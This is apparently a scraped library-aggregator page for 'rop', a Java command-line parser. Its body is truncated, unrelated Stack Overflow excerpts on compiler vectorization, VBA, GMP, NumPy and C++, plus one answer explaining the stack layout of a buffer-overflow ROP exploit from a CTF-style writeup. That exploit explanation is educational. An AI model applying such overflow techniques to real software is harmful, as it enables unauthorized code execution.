rop | A lightweight command line option parser written in Java | Command Line Interface library
kandi X-RAY | rop Summary
kandi X-RAY | rop Summary
Rop is designed to be minimal meanwhile convenient, and to cover most usual command line parsing use cases listed below:. All these types of command line applications can be built using Rop.
Support
Quality
Security
License
Reuse
Top functions reviewed by kandi - BETA
- Removes the option prefix from the given string
- Returns an instance of the specified class
rop Key Features
rop Examples and Code Snippets
Community Discussions
Trending Discussions on rop
QUESTION
I'm trying to make sure gcc vectorizes my loops. It turns out, that by using -march=znver1
(or -march=native
) gcc skips some loops even though they can be vectorized. Why does this happen?
In this code, the second loop, which multiplies each element by a scalar is not vectorised:
...ANSWER
Answered 2022-Apr-10 at 02:47The default -mtune=generic
has -mprefer-vector-width=256
, and -mavx2
doesn't change that.
znver1 implies -mprefer-vector-width=128
, because that's all the native width of the HW. An instruction using 32-byte YMM vectors decodes to at least 2 uops, more if it's a lane-crossing shuffle. For simple vertical SIMD like this, 32-byte vectors would be ok; the pipeline handles 2-uop instructions efficiently. (And I think is 6 uops wide but only 5 instructions wide, so max front-end throughput isn't available using only 1-uop instructions). But when vectorization would require shuffling, e.g. with arrays of different element widths, GCC code-gen can get messier with 256-bit or wider.
And vmovdqa ymm0, ymm1
mov-elimination only works on the low 128-bit half on Zen1. Also, normally using 256-bit vectors would imply one should use vzeroupper
afterwards, to avoid performance problems on other CPUs (but not Zen1).
I don't know how Zen1 handles misaligned 32-byte loads/stores where each 16-byte half is aligned but in separate cache lines. If that performs well, GCC might want to consider increasing the znver1 -mprefer-vector-width
to 256. But wider vectors means more cleanup code if the size isn't known to be a multiple of the vector width.
Ideally GCC would be able to detect easy cases like this and use 256-bit vectors there. (Pure vertical, no mixing of element widths, constant size that's am multiple of 32 bytes.) At least on CPUs where that's fine: znver1, but not bdver2 for example where 256-bit stores are always slow due to a CPU design bug.
You can see the result of this choice in the way it vectorizes your first loop, the memset-like loop, with a vmovdqu [rdx], xmm0
. https://godbolt.org/z/E5Tq7Gfzc
So given that GCC has decided to only use 128-bit vectors, which can only hold two uint64_t
elements, it (rightly or wrongly) decides it wouldn't be worth using vpsllq
/ vpaddd
to implement qword *5
as (v<<2) + v
, vs. doing it with integer in one LEA instruction.
Almost certainly wrongly in this case, since it still requires a separate load and store for every element or pair of elements. (And loop overhead since GCC's default is not to unroll except with PGO, -fprofile-use
. SIMD is like loop unrolling, especially on a CPU that handles 256-bit vectors as 2 separate uops.)
I'm not sure exactly what GCC means by "not vectorized: unsupported data-type". x86 doesn't have a SIMD uint64_t
multiply instruction until AVX-512, so perhaps GCC assigns it a cost based on the general case of having to emulate it with multiple 32x32 => 64-bit pmuludq
instructions and a bunch of shuffles. And it's only after it gets over that hump that it realizes that it's actually quite cheap for a constant like 5
with only 2 set bits?
That would explain GCC's decision-making process here, but I'm not sure it's exactly the right explanation. Still, these kinds of factors are what happen in a complex piece of machinery like a compiler. A skilled human can easily make smarter choices, but compilers just do sequences of optimization passes that don't always consider the big picture and all the details at the same time.
-mprefer-vector-width=256
doesn't help:
Not vectorizing uint64_t *= 5
seems to be a GCC9 regression
(The benchmarks in the question confirm that an actual Zen1 CPU gets a nearly 2x speedup, as expected from doing 2x uint64 in 6 uops vs. 1x in 5 uops with scalar. Or 4x uint64_t in 10 uops with 256-bit vectors, including two 128-bit stores which will be the throughput bottleneck along with the front-end.)
Even with -march=znver1 -O3 -mprefer-vector-width=256
, we don't get the *= 5
loop vectorized with GCC9, 10, or 11, or current trunk. As you say, we do with -march=znver2
. https://godbolt.org/z/dMTh7Wxcq
We do get vectorization with those options for uint32_t
(even leaving the vector width at 128-bit). Scalar would cost 4 operations per vector uop (not instruction), regardless of 128 or 256-bit vectorization on Zen1, so this doesn't tell us whether *=
is what makes the cost-model decide not to vectorize, or just the 2 vs. 4 elements per 128-bit internal uop.
With uint64_t
, changing to arr[i] += arr[i]<<2;
still doesn't vectorize, but arr[i] <<= 1;
does. (https://godbolt.org/z/6PMn93Y5G). Even arr[i] <<= 2;
and arr[i] += 123
in the same loop vectorize, to the same instructions that GCC thinks aren't worth it for vectorizing *= 5
, just different operands, constant instead of the original vector again. (Scalar could still use one LEA). So clearly the cost-model isn't looking as far as final x86 asm machine instructions, but I don't know why arr[i] += arr[i]
would be considered more expensive than arr[i] <<= 1;
which is exactly the same thing.
GCC8 does vectorize your loop, even with 128-bit vector width: https://godbolt.org/z/5o6qjc7f6
QUESTION
I got 2 tabs in excel and i am kinda new to VBA:
Operations:
Details:
Excel view:
Take a look at this: DESCRIPTION field from tab "Operations" will contain different "operation codes" (it may contain 1 operation code, 2 operation codes or much more). It is a 11-DIGIT number . The problem is that this field is fixed and sometimes the operation code is truncated.
ONLY THOSE NUMBERS with exact amount of 11 digits must be considered
I WANT TO ACHIEVE THIS:
VBA SHOULD FIND EVERY TRANSACTION INSIDE "DESCRIPTION" CELL FROM TAB "OPERATIONS". IN THIS CASE THE FIRST ROW CONTAINS ONE TRANSACTION, ROW 2 CONTAINS ONE TRANSACTION AND ROW 3 CONTAINS 2 TRANSACTIONS AND ONLY CONSIDER THE OPERATION CODES WITHIN 11 DIGITS
IT SHOULD COPY THE NUMBER FROM TAB "OPERATIONS" AND PASTE IT INSIDE COLUMN "NUMBER" FROM TAB "DESCRIPTION"
Expected output:
dataset:
...ANSWER
Answered 2022-Feb-22 at 16:32EDIT: made a few changes, including swapping out for a non-regex pattern match (still fast).
Tested on your sample data.
QUESTION
gmp library provides the function void mpf_pow_ui (mpf_t rop, const mpf_t op1, unsigned long int op2)
to raise op1
to the power op2
(according to https://gmplib.org/manual/Float-Arithmetic#index-Powering-functions-1).
But the documentation seems to say nothing about it in the c++ interface. I've tried with names such as pow
, pow_iu
, power
but none of them are defined.
Is there the way to raise a float to an exponent (either float or integer) using gmpxx?
...ANSWER
Answered 2022-Jan-11 at 18:51gmpxx.h
contains interfaces to some mathematical operations like sqrt
(see line 3341)
QUESTION
I want to display the text file in my c++ program but nothing appears and the program just ended. I am using struct here. I previously used this kind of method, but now I am not sure why it isn't working. I hope someone could help me. Thanks a lot.
...ANSWER
Answered 2021-Dec-04 at 11:06Unfortunately you text file is not a typical CSV file, delimited by some character like a comma or such. The entries in the lines seem to be separated by tabs. But this is a guess by me. Anyway. The structure of the source file makes it harder to read.
Additionally, the file has an header and while reading the first line andtry to read the word "ID" into an int variable, this conversion will fail. The failbit of the stream is set, and from then on all further access to any iostream function for this stream will do nothing any longer. It will ignore all your further requests to read something.
Additional difficulty is that you have spaces in data fields. But the extractor operator for formatted input >>
will stop, if it sees a white space. So, maybe only read half of the field in a record.
Solution: You must first read the header file, then the data rows. Next, you must know if the file is really tab separated. Sometimes tabs are converted to spaces. In that case, we would need to recreate the start position of a field in the a record.
In any case, you need to read a complete line, and after that split it in parts.
For the first solution approach, I assume tab separated fields.
One of many possible examples:
QUESTION
I am trying to make a parser for the following recursive datatype:
...ANSWER
Answered 2021-Dec-01 at 05:12The language of expressions that you describe isn't regular. So you'll have to use a different library.
Luckily, essentially the same parser structure should work fine with most other parser combinator libraries. It should be as simple as substituting your new library's name for a few basic parsers in place of their regex-applicative analogs.
QUESTION
TLDR; I'm performing an array operation (no mathematics) and I've found Cython to be significantly faster. Is there a way I can speed this up in NumPy; or Cython?
Context
I'm writing a function that is meant to take a subset of an NxN
array from index
onward in both directions (whose top corner is along the diagonal) and shift it one place upwards along the diagonal. Secondly, I need to shift the top row from index
onward one place to the left. Lastly, I need to set the last column in the array to zero after the operation.
The array is a strictly upper triangular matrix meaning that everything from the diagonal downwards is set to 0. This is my attempt at an elegant way to store historical collision data between pairs of objects (whose indices are represented by indices in the matrix). This would be similar to making a nested list of size n!/(2(n-2)!)
which represents the ordered pairs of a list of indices of length n
. In this algorithm, I hope to "remove" an object from the collision pairing matrix.
The advantage I find in this implementation is that "removing a collision pair" from the matrix is much less computationally intensive than removing pairs from a nested list and shifting the indices in pairs past the "index to remove" point.
The overall project centers around the automated "packing" of 3D models into a build volume for powder bed fusion additive manufacturing. The algorithm uses simulated annealing, so the ability to prune a collision set, store historical information, add/remove geometry are of upmost importance and need to be well optimized.
Example
Lets say our array takes this form (not representative of actual data).
...ANSWER
Answered 2021-Nov-25 at 11:30The reason why the expression arr[index:-1, index:-1] = arr[index + 1:, index + 1:]
is slow in both Numpy and Cython and the Cython code is much faster is a bit counter intuitive: this expression is not efficiently implemented in both Numpy and Cython.
Indeed, Numpy copy the right-hand side (arr[index + 1:, index + 1:]
) in a temporary array allocated on-the-fly. The temporary array is then copied to the left-hand side (arr[index:-1, index:-1]
). This means that two memory copy are performed while only one could be used. It is even worse: the copied memory is pretty big and will not fit in the cache resulting in a bigger overhead (on some processors, like the mainstream x86/x86-64 ones, the write-back policy cause additional slow reads). Moreover, the new temporary array will cause many page fault slowing down even more the copy.
Numpy do this because the left-hand side and the right-hand side may overlap (which is the case here) and thus the order in which the memory bytes are copied matter a lot. Numpy use a slow conservative approach rather than an optimized implementation. This is a missed optimization. Cython does exactly the same thing.
Your Cython code do not suffer from all these overheads: it directly copy the array in-place relatively efficiently. The value read are kept in the cache and then written just after so that the write-back policy is not an issue. Moreover, there are no temporary array nor page faults. Finally, your Cython code do not copy the lower-part of the triangular matrix resulting in fewer bytes to be copied compared to the expression previously mentioned.
One way to reduce the overhead of the Numpy expression is to copy the matrix chunk-by-chunk and allocates a small temporary buffer for that (typically few lines of the matrix). However, this is far from being easy since CPython loops are generally very slow and the chunk size should fit in cache so the method can be useful...
Further optimization: conditionals are slow. You can remove them by starting the j
-based loop at i+1
and ending it at n-1
. Another j
-based loop can then fill the value greater than n-1
. For the same reason, the i
-based loop should end at n-1
and another loop can then fill the remaining part of the array. A good compiler should use faster SIMD instructions.
QUESTION
I've been working on the Euler 29 problem for a few days and am having difficulty getting the mpz_t type to work correctly. The objective is to iterate through a^b for values of 2 <= a,b <= 100 and count the nonrepeat values.
Using vector I was able to store the values using pointers in an array like so:
...ANSWER
Answered 2021-Nov-19 at 18:03I figured out that due to the way mpz_t variables work the mpz_set function does not work with a pointer to mpz_t type variables as a parameter.
Instead, I was able to get the program to work by assigning the mpz_get_str function to a string and pushing that to a vector of strings to check for repeat values.
QUESTION
I'm following this writeup on a buffer overflow of an array on the stack, doing a ROP attack to call a function that wouldn't normally be called.
There are three functions. vuln,flag and main.
main just calls vuln and vuln has a stackoverflow with 180 bytes.
...ANSWER
Answered 2021-Oct-22 at 14:26The AAAA
are because on entry to flag
, it expects the top of the stack to contain its return address, with arguments starting 4 bytes past that. You don't care about flag
being able to return, so you just need 4 bytes of garbage in place of the return address.
As for the \r
, it isn't between the arguments (they should be adjacent in memory and there can't be any bytes between them); rather it is actually the first (least-significant) byte of the second argument. The ASCII carriage return \r
has numerical value 0x0d
, so your arguments are 0xdeadbeef, 0xc0ded00d
. I don't know why they wrote the low byte as \r
instead of \x0d
which would have been more consistent. Maybe it was automatically translated from binary to hex escapes by some program.
QUESTION
As a simplified example, consider this table with two fields. One is a string and the other is XML.
...ANSWER
Answered 2021-Sep-01 at 12:52It looks like you want to pull out the inner text of the ParameterList
node inside the XML. You can use .value
and XQuery for this:
QUESTION
Below is my json respone:
...ANSWER
Answered 2021-Jul-10 at 10:06Your src
attribute for the img
tag will be something like this
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
No vulnerabilities reported
Install rop
Support
Reuse Trending Solutions
Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items
Find more librariesStay Updated
Subscribe to our newsletter for trending solutions and developer bootcamps
Share this Page